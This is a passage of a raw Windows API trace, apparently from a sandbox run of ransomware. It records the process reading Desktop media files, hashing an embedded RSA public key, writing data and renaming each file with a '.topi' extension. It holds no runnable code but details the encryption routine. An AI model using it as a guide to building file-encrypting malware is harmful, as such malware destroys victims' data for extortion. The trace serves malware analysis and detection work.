dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.268] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.268] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.268] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.268] CloseHandle (hObject=0x6a8) returned 1 [0094.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.270] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-onKqnd5MCC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-onkqnd5mcc.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-onKqnd5MCC.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-onkqnd5mcc.m4a.topi")) returned 1 [0094.271] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.271] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.271] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.272] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d660ee0, ftCreationTime.dwHighDateTime=0x1d5bd37, ftLastAccessTime.dwLowDateTime=0xba5f0ae0, ftLastAccessTime.dwHighDateTime=0x1d5c22f, ftLastWriteTime.dwLowDateTime=0xba5f0ae0, ftLastWriteTime.dwHighDateTime=0x1d5c22f, nFileSizeHigh=0x0, nFileSizeLow=0xc992, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3D jV1aW-bMTSH.mp3", cAlternateFileName="3DJV1A~1.MP3")) returned 1 [0094.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.272] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3D jV1aW-bMTSH.mp3") returned=".mp3" [0094.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3D jV1aW-bMTSH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3d jv1aw-bmtsh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.273] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=51602) returned 1 [0094.273] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.275] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xc96c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.276] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.276] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.276] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xc992, lpOverlapped=0x0) returned 1 [0094.277] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.277] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.277] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.277] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.278] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.278] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.278] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.278] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.278] GetLastError () returned 0x0 [0094.278] SetLastError (dwErrCode=0x0) [0094.278] GetLastError () returned 0x0 [0094.278] SetLastError (dwErrCode=0x0) [0094.278] GetLastError () returned 0x0 [0094.278] SetLastError (dwErrCode=0x0) [0094.278] GetLastError () returned 0x0 [0094.278] SetLastError (dwErrCode=0x0) [0094.278] GetLastError () returned 0x0 [0094.278] SetLastError (dwErrCode=0x0) [0094.279] GetLastError () returned 0x0 [0094.279] SetLastError (dwErrCode=0x0) [0094.279] GetLastError () returned 0x0 [0094.279] SetLastError (dwErrCode=0x0) [0094.279] GetLastError () returned 0x0 [0094.279] SetLastError (dwErrCode=0x0) [0094.279] GetLastError () returned 0x0 [0094.279] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.279] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.279] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.279] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.279] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc990) returned 0x99f52d8 [0094.280] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.280] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8f58 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8d48 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.282] GetCurrentThreadId () returned 0x8c4 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1280 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.282] GetCurrentThreadId () returned 0x8c4 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.284] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3D jV1aW-bMTSH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3d jv1aw-bmtsh.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3D jV1aW-bMTSH.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3d jv1aw-bmtsh.mp3.topi")) returned 1 [0094.287] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3xYK0ZckOZDaaz36qgE.jpg") returned=".jpg" [0094.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3xYK0ZckOZDaaz36qgE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3xyk0zckozdaaz36qge.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.287] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=83404) returned 1 [0094.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.291] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x145a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.291] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.292] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x145cc, lpOverlapped=0x0) returned 1 [0094.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.293] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.293] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.294] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.294] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.294] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.294] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.294] GetLastError () returned 0x0 [0094.294] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.294] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.294] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.294] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.294] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.294] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.294] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.294] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 